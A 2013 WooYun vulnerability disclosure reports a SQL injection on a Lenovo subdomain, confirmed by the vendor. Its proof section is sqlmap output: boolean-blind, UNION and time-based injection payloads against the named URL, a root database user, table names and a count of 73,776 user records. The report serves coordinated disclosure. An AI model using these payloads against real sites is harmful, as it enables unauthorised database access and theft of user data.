联想安全问题十一某分站ROOT权限伪静态注射（73776用户数据危险）

漏洞概要关注数(24) 关注此漏洞

缺陷编号：wooyun-2013-035358

漏洞标题：联想安全问题十一某分站ROOT权限伪静态注射（73776用户数据危险）

漏洞作者： VIP

提交时间：2013-08-27 10:27

修复时间：2013-10-11 10:28

公开时间：2013-10-11 10:28

漏洞类型：SQL注射漏洞

危害等级：高

自评Rank：20

漏洞状态：厂商已经确认

漏洞来源： http://www.wooyun.org，如有疑问或需要帮助请联系 [email protected]

Tags标签：无

4人收藏收藏
分享漏洞：

漏洞详情

披露状态：

2013-08-27：细节已通知厂商并且等待厂商处理中
2013-08-27：厂商已经确认，细节仅向厂商公开
2013-09-06：细节向核心白帽子及相关领域专家公开
2013-09-16：细节向普通白帽子公开
2013-09-26：细节向实习白帽子公开
2013-10-11：细节向公众公开

简要描述：

漏洞好多哦，权限好高哦，理论上可以写shell哦。

详细说明：

注射点

http://voice.lenovo.com.cn:80/Video/amember/pic/1/id/2

伪静态注射一枚

漏洞证明：

---
Place: URI
Parameter: #1*
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: http://voice.lenovo.com.cn:80/Video/amember/pic/1/id/2) AND 6959=69
59 AND (6436=6436
    Type: UNION query
    Title: Generic UNION query (NULL) - 10 columns
    Payload: http://voice.lenovo.com.cn:80/Video/amember/pic/1/id/2) UNION ALL S
ELECT NULL,NULL,NULL,NULL,NULL,CONCAT(0x71777a7a71,0x744242694d7957634446,0x716b
736f71),NULL,NULL,NULL,NULL--
    Type: AND/OR time-based blind
    Title: MySQL > 5.0.11 AND time-based blind
    Payload: http://voice.lenovo.com.cn:80/Video/amember/pic/1/id/2) AND SLEEP(5
) AND (3326=3326
---

web server operating system: Linux CentOS 6.3
web application technology: Apache 2.2.15
back-end DBMS: MySQL 5.0.11

权限好高

[09:35:13] [INFO] fetching current user
current user:    'root@localhost'

当前库

current database:    'voice'

23个表

Database: voice
[23 tables]
+--------------+
| tb_access    |
| tb_backpk    |
| tb_cat       |
| tb_config    |
| tb_down      |
| tb_members   |
| tb_news      |
| tb_node      |
| tb_pics      |
| tb_pkfscores |
| tb_pks       |
| tb_pkscores  |
| tb_qi        |
| tb_role      |
| tb_role_user |
| tb_scores    |
| tb_shares    |
| tb_star      |
| tb_teachers  |
| tb_teams     |
| tb_user      |
| tb_users     |
| tb_videos    |
+--------------+

好多用户

+----------+---------+
| Table    | Entries |
+----------+---------+
| tb_users | 73776   |
+----------+---------+

修复方案：

过滤吧

版权声明：转载请注明来源 VIP@乌云

漏洞回应

厂商回应：

危害等级：中

漏洞Rank：10

确认时间：2013-08-27 14:11

厂商回复：

感谢您对联想安全做出的贡献！我们将立即评估与修复相关漏洞

WooYun.org

漏洞概要关注数(24) 关注此漏洞

缺陷编号：wooyun-2013-035358

漏洞标题：联想安全问题十一某分站ROOT权限伪静态注射（73776用户数据危险）

相关厂商：联想

漏洞作者： VIP

提交时间：2013-08-27 10:27

修复时间：2013-10-11 10:28

公开时间：2013-10-11 10:28

漏洞类型：SQL注射漏洞

危害等级：高

自评Rank：20

漏洞状态：厂商已经确认

漏洞来源： http://www.wooyun.org，如有疑问或需要帮助请联系 [email protected]

Tags标签：无

4人收藏收藏
分享漏洞：

漏洞详情

披露状态：

简要描述：

详细说明：

漏洞证明：

修复方案：

版权声明：转载请注明来源 VIP@乌云

漏洞回应

厂商回应：

厂商回复：

最新状态：

WooYun.org

漏洞概要 关注数(24) 关注此漏洞

缺陷编号：wooyun-2013-035358

漏洞标题：联想安全问题十一某分站ROOT权限伪静态注射（73776用户数据危险）

相关厂商：联想

漏洞作者： VIP

提交时间：2013-08-27 10:27

修复时间：2013-10-11 10:28

公开时间：2013-10-11 10:28

漏洞类型：SQL注射漏洞

危害等级：高

自评Rank：20

漏洞状态：厂商已经确认

Tags标签： 无

4人收藏 收藏 var token=""; var id="wooyun-2013-035358"; $(".btn-fav").click(function(){ CollectBug(id,token); }); 分享漏洞：

漏洞详情

披露状态：

简要描述：

详细说明：

漏洞证明：

修复方案：

版权声明：转载请注明来源 VIP@乌云

漏洞回应

厂商回应：

厂商回复：

最新状态：

漏洞概要关注数(24) 关注此漏洞

Tags标签：无

4人收藏收藏
分享漏洞：